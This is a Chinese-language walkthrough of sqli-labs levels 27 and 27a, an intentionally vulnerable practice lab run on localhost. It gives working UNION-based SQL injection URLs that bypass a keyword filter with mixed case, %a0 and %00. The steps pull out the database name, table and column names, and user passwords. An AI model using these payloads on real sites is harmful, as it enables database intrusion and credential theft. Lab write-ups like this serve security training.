sqli-labs (less-27 and less-27a)
less-27
进入27关,输入ID=1查看屏幕回显
直接查看源代码
发现在less-26的基础上过滤了UNION,SELECT,union,select,这里我们可以采取大小写混合过滤
确定回显位置
http://127.0.0.1/sql1/Less-27/?id=1111' %a0 UniOn %a0 SelECT %a0 1,2,3;%00
查看当前库
http://127.0.0.1/sql1/Less-27/?id=1111' %a0 UniOn %a0 SelECT %a0 1,2,database();%00
查看security库下的所有表
http://127.0.0.1/sql1/Less-27/?id=1111' %a0 UniOn %a0 SelECT %a0 1,2,(sELect (group_concat(table_name)) from (information_schema.tables) where (table_schema='security'));%00
查看users表下的所有字段
http://127.0.0.1/sql1/Less-27/?id=1111' %a0 UniOn %a0 SelECT %a0 1,2,(sELect (group_concat(column_name)) from (information_schema.columns) where (table_name='users'));%00
查看username,password字段的值
http://127.0.0.1/sql1/Less-27/?id=1111' %a0 UniOn %a0 SelECT %a0 1,2,(sELect (group_concat(username,password)) from (security.users));%00
less-27a
输入
http://127.0.0.1/sql1/Less-27a/?id=1' #正常显示
http://127.0.0.1/sql1/Less-27a/?id=1" #回显错误
判断闭合方式为";%00,并且为字符型注入
接下来的与less-27完全一样,这里不具体介绍,本关主要是过滤了union,UNION,select,SELECT,采用大小写混合绕过即可